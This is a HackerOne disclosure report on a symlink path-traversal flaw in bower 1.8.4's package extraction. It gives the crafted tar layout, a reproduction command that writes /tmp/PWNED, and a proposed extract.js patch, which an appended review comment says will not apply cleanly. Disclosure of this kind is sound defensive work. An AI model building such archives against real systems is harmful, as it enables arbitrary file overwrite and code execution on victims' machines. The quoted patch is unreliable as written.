HackerOne report H1:473811

Node.js third-party modules: [bower] Arbitrary File Write through improper validation of symlinks while package extraction

2019-01-01 17:17:27 | skyn3t | hackerone.com

EPSS: 0.003 (Low), percentile 65.4%

I would like to report a file write in arbitrary locations via the install command in bower.
It allows attackers to write arbitrary files when a malicious package is extracted.

Module

  • module name: bower
  • version: 1.8.4
  • npm page: https://www.npmjs.com/package/bower

Module Description

Bower offers a generic, unopinionated solution to the problem of front-end package management, while exposing the package dependency model via an API that can be consumed by a more opinionated build stack. There are no system wide dependencies, no dependencies are shared between different apps, and the dependency tree is flat.

Module Stats

weekly downloads: 175,693

Vulnerability

Vulnerability Description

Quoting from #362118

> The vulnerability is a form of directory traversal that can be exploited by extracting files from an archive. The premise of the directory traversal vulnerability is that an attacker can gain access to parts of the file system outside of the target folder in which they should reside. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim's machine. The vulnerability can also cause damage by overwriting configuration files or other sensitive resources, and can be exploited on both client (user) machines and servers.

When we install a package that is in the tar archive format using bower, it tries to extract the package first. Bower's installer attempts to prevent a package from writing any files outside the install directory; however, it is possible to bypass the check with a symbolic link in a crafted npm package: the archive first declares a symlink entry pointing outside the install directory, and a later entry whose path passes through that symlink is then written at the link's target.

Example structure of malicious npm package:

$ tar -xvf hello.tar.gz
hello/
hello/README.md
hello/link
hello/link/PWNED
hello/package.json

$ tar -tvf hello.tar.gz
drwxr-xr-x 0/0               0 2019-01-01 21:27 hello/
-rw-r--r-- 0/0              12 2019-01-01 21:27 hello/README.md
lrw-r--r-- 0/0               0 2019-01-01 21:27 hello/link -> /tmp
-rw-r--r-- 0/0              15 2019-01-01 21:27 hello/link/PWNED
-rw-r--r-- 0/0             102 2019-01-01 21:27 hello/package.json

Steps To Reproduce:

Using attached file hello.tar.gz

$ bower install ./hello.tar.gz
bower hello.tar#*                 copy /home/path/hello.tar.gz
bower hello.tar#*              extract hello.tar.gz
bower hello.tar#*             resolved /home/path/hello.tar.gz
bower hello.tar#*              install hello.tar

This creates a file /tmp/PWNED, which is a sufficient PoC.

Patch

I'm fully aware that bower has been deprecated and using yarn is advised. Therefore, I would recommend releasing an advisory if a patch might not be possible.

The vulnerability lies in extract.js:

function isSymlink(entry) {
    return entry.type === 'SymbolicLink';
}

According to the tar-fs docs, making the following changes will properly ignore symlinks:

- function isSymlink(entry) {
+ function isSymlink(_, entry) {
-     return entry.type === 'SymbolicLink';
+    return entry.type === 'symlink';
}
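Review bot: the `-     return entry.type === 'SymbolicLink';` line carries five spaces of indentation while the function as quoted above uses four, so this hunk will not apply cleanly against extract.js; the closing `}` should also be a context line with a leading space. The signature change to `isSymlink(_, entry)` is not shown together with its call site: it is only correct if isSymlink is passed as tar-fs's `ignore` option, whose callback receives `(name, header)` and whose header type for a symbolic link is the tar-stream value `'symlink'` rather than `'SymbolicLink'`. The call site in extract.js should be confirmed, or included in the patch, so that the two-argument form is actually what tar-fs invokes.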

Supporting Material/References:


  • Ubuntu 16.04
  • Node v11.3.0
  • Bower 1.8.4

Wrap up

  • I contacted the maintainer to let them know: N
  • I opened an issue in the related repository: N


{F399574}

Impact

Writing arbitrary files on the system